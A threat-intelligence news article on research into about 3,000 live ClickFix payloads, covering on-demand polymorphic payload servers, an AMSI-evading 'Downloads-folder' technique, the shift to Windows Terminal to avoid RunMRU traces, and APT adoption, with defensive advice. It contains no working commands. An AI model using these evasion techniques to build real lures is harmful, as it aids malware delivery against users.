Bert-Jan Pals analyzed approximately 3,000 payloads from active ClickFix campaigns, presenting the findings on June 30, 2026. The research reveals a maturity leap: from artisanal commands copied to the clipboard to an on-demand, API-based delivery system with polymorphic generators and the commercialization of ready-made builders. The figure that stops you cold is the scale of this shift: 100 consecutive requests to the server produced 100 distinct payloads.
- Bert-Jan Pals analyzed roughly 3,000 ClickFix payloads from live campaigns; 100 requests to the API server generated 100 unique payloads with rotating cryptographic wrapping
- The infrastructure serves lures in 25 languages and adapts the payload to the visitor's operating system, including macOS
- New "Downloads-folder" technique: a benign clipboard command orchestrates a previously downloaded file, evading AMSI
- Nation-state APT groups — APT28, MuddyWater, Kimsuky, and North Korean actors — have adopted ClickFix in their infection chains
From Copy-Paste to On-Demand Generation: The API Architecture
The ClickFix mechanism is well known: a deceptive page tricks the user into pressing a key combination, copying a command to the clipboard, and pasting it into PowerShell or the Run dialog. What Pals mapped is what happens behind that surface.
The payloads originate from backend servers structured as an API service. The researcher documented access tokens, operational logging, and on-demand generation: every request yields a fresh payload, with the same core script wrapped in different cryptographic layers. A test of 100 consecutive requests returned 100 unique variants, rotating through Base64, AES, TripleDES, Rijndael, and Deflate. "The move from one-off scripts to on-demand payload servers is what keeps that adaptation cheap to repeat," Pals observed.
The platform segments traffic by language and operating system. Twenty-five languages are documented, with automatic command adaptation for the target: Windows, and in some cases macOS. Three distinct payload servers were identified in the research, though full details on names and endpoints are not available in the published excerpt.
"ClickFix is here to stay"
— Bert-Jan Pals
Downloads-Folder: The Specific Evolution Against AMSI
Windows' primary defense against malicious in-memory scripts is AMSI, the Antimalware Scan Interface. Traditional ClickFix payloads run into AMSI when the copied command is pasted and interpreted. The new technique documented by Pals, dubbed "Downloads-folder," restructures the flow to bypass this check.
The command copied to the clipboard is benign by design: it moves or renames a file already sitting in the Downloads folder. The real payload was downloaded laterally beforehand, separated from the command that triggers it. AMSI scans what passes through the script execution pipeline; a file-move instruction does not trigger the same path. "The disguise is disposable; the malware under it is not," the researcher summarized.
Another adaptation noted is the shift from the Run dialog to Windows Terminal as an execution vehicle. This change reduces forensic traces: the command no longer appears in RunMRU, the registry of recent Run dialog instructions, making post-incident reconstruction harder.
The Numbers Measuring the Surge
ClickFix adoption has reached industrial scale. ESET measured a significant increase in this technique from late 2024 through the first half of 2025. Microsoft flagged ClickFix in 47% of initial access cases detected by the Defender Experts team. Expel detected a wave dubbed ClearFix that likely infected tens of thousands of endpoints starting in August 2025.
The most frequent launchers in the analyzed payloads are PowerShell and cmd.exe, both at roughly 39%, followed by msiexec.exe at roughly 34%. The distribution across multiple execution vectors indicates operators do not rely on a single system binary but test and adapt based on the victim context.
From Mass Crimeware to Nation-State APT Operations
APT adoption of ClickFix documents the transition from a generic criminal technique to a strategic component. APT28 (Russia), MuddyWater (Iran), and Kimsuky (North Korea) have integrated it into their infection chains. ESET tracked the sale of ready-made ClickFix builders to other actors, indicating active commercialization of the infrastructure.
A specific campaign, "ClickFake Interview," Interview," attributed to North Korean operators, used this technique against cryptocurrency sector workers. The dossier does not specify whether the APTs use the same API infrastructure identified by Pals or independent variants, but the convergence on the method is the significant data point.
What to Do Now
Defenses against ClickFix require a specific realignment on three fronts. First: endpoint controls must extend beyond script memory scanning, because the Downloads-folder technique separates the benign command — which passes through AMSI — from the malicious payload already resident on disk. Second: security teams must monitor the use of Windows Terminal as an execution vehicle, not just the traditional Run dialog, given the operator shift documented.
Third: visibility into the 3,000 payloads Pals analyzed shows 39% of attacks use PowerShell and 39% use cmd.exe, with 34% routing through msiexec.exe. This distribution demands multi-platform detection rules, not a focus on a single launcher. The on-demand generation of 100 unique payloads from 100 requests also renders static signatures ineffective: detection must shift to anomalous execution-chain behaviors, not hashes or cryptographic patterns.
The commercialization of builders and APT adoption confirm ClickFix has crossed the threshold separating ephemeral tactics from persistent infrastructure. The open question is how quickly defenses can rebuild visibility over a flow that now fractures between a benign clipboard and a lateral file.
Information is based on the cited source and current as of publication.
Sources
- https://thehackernews.com/2026/07/researcher-analyzes-3000-live-clickfix.html
- https://isc.sans.edu/diary/rss/33102
- https://www.recordedfuture.com/blog/may-2026-cve-landscape
- https://support.recordedfuture.com/
- https://isc.sans.edu/diary/An+Example+of+Stack+String+in+High+Level+Language/33008
- https://attack.mitre.org/techniques/T1036/
- https://www.sygnia.co/blog/operation-highland-velvet-ant/